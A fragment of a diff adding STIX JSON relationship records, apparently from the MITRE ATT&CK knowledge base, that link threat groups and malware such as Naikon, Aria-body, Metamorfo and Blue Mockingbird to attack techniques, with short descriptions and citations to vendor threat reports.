+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has encrypted the payload used for C2.(Citation: Symantec Whitefly March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--95c6eafc-4b3f-404b-86d9-13b4ae4845da",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.964Z",
+ "created": "2020-05-26T17:14:42.964Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eda182e5-ad1a-466b-8ede-664a2c778076",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.966Z",
+ "created": "2020-05-26T17:14:42.966Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aca1a51b-89a5-45e9-bce5-14b5a0a4c0f1",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.968Z",
+ "created": "2020-05-26T17:14:42.968Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used search order hijacking to run the loader Vcrodat.(Citation: Symantec Whitefly March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2e2daf37-1d3d-4b24-ab46-dfc894f9ef96",
+ "type": "relationship",
+ "modified": "2020-05-26T17:14:42.986Z",
+ "created": "2020-05-26T17:14:42.986Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has searched files and directories for various files and strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f45f18e9-4a0c-4f22-8ef6-5a18314535ea",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.852Z",
+ "created": "2020-05-26T18:03:17.256Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2e418dd3-d6dc-4d02-a555-2b3a13936dc3",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.884Z",
+ "created": "2020-05-26T18:03:17.283Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--44533bc7-0368-4269-b465-7e08d3a8beea",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.901Z",
+ "created": "2020-05-26T18:03:17.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has obfuscated and encrypted some payloads.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a299dae-7ee2-4e5e-8be6-eb014f58205b",
+ "type": "relationship",
+ "modified": "2020-06-24T18:16:36.641Z",
+ "created": "2020-05-26T18:37:13.094Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written its executable path to the Registry Run key to achieve persistence.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--4be5482c-2a58-41af-a7d7-477c596b4622",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:15.902Z",
+ "created": "2020-05-26T18:49:10.050Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has used DLL side-loading to load malicious DLL's into legitimate executables.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d4657411-8fa6-4bbc-9ed0-474eafd14375",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.254Z",
+ "created": "2020-05-26T19:31:59.254Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has convinced victims to open malicious attachments to execute malware.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d159e441-b30b-464a-8838-b83864173e89",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.263Z",
+ "created": "2020-05-26T19:31:59.263Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6f38eb77-da3f-4a35-b048-32a4fa6c6fbc",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.257Z",
+ "created": "2020-05-26T19:31:59.257Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) has used malicious e-mail attachments to deliver malware.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--80fb05e9-68b8-4e3f-bc9a-2a5f828c397c",
+ "type": "relationship",
+ "modified": "2020-05-26T19:31:59.275Z",
+ "created": "2020-05-26T19:31:59.275Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ed113911-e21a-4b1b-a082-42313d5aa887",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.300Z",
+ "created": "2020-05-26T19:43:49.658Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--76701e52-cfce-4294-91e4-485fad7c8f0f",
+ "type": "relationship",
+ "modified": "2020-05-26T19:43:49.669Z",
+ "created": "2020-05-26T19:43:49.669Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the \"wercplsupport\" service.(Citation: RedCanary Mockingbird May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8dc7e200-3c90-4611-9bbe-aa90056f423e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.612Z",
+ "created": "2020-05-26T20:09:39.224Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.(Citation: RedCanary Mockingbird May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b04c89b2-f790-4961-a012-7ccd18d1436e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.699Z",
+ "created": "2020-05-26T20:09:39.243Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--66513679-0866-4091-a346-2679db5e3cca",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.792Z",
+ "created": "2020-05-26T20:09:39.246Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a4bb6f26-b659-4d1d-b0fc-f4f4efe32db6",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.795Z",
+ "created": "2020-05-26T20:09:39.255Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).",
+ "relationship_type": "uses",
+ "id": "relationship--0ed0ef18-126f-4a03-ac2a-f315dfb48b7d",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.308Z",
+ "created": "2020-05-26T20:33:11.668Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using ShellExecute.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1681f4aa-4bb1-482a-8fdf-8c1b724635d9",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.314Z",
+ "created": "2020-05-26T20:33:11.713Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--17bfea1d-e3c8-4bf9-8102-576e7c87883e",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.319Z",
+ "created": "2020-05-26T20:33:11.721Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cbb686ae-3dc8-4e91-80fc-075209505425",
+ "type": "relationship",
+ "modified": "2020-05-26T20:33:11.746Z",
+ "created": "2020-05-26T20:33:11.746Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--535b87bb-31fd-4e14-8279-c64c301e912d",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.365Z",
+ "created": "2020-05-26T20:33:11.729Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--26303f07-87f0-4740-b6ea-e81e8c01b267",
+ "type": "relationship",
+ "modified": "2020-05-26T20:33:11.754Z",
+ "created": "2020-05-26T20:33:11.754Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--61bf5c24-e7ae-4178-916d-d236e928b897",
+ "type": "relationship",
+ "modified": "2020-05-26T20:33:11.730Z",
+ "created": "2020-05-26T20:33:11.730Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--914406e6-9388-477d-ba6b-97e5ebec31f0",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.355Z",
+ "created": "2020-05-26T20:33:11.739Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ff87edd7-34b1-47f2-9131-dd6a47854805",
+ "type": "relationship",
+ "modified": "2020-06-03T13:40:15.341Z",
+ "created": "2020-05-26T20:36:16.472Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
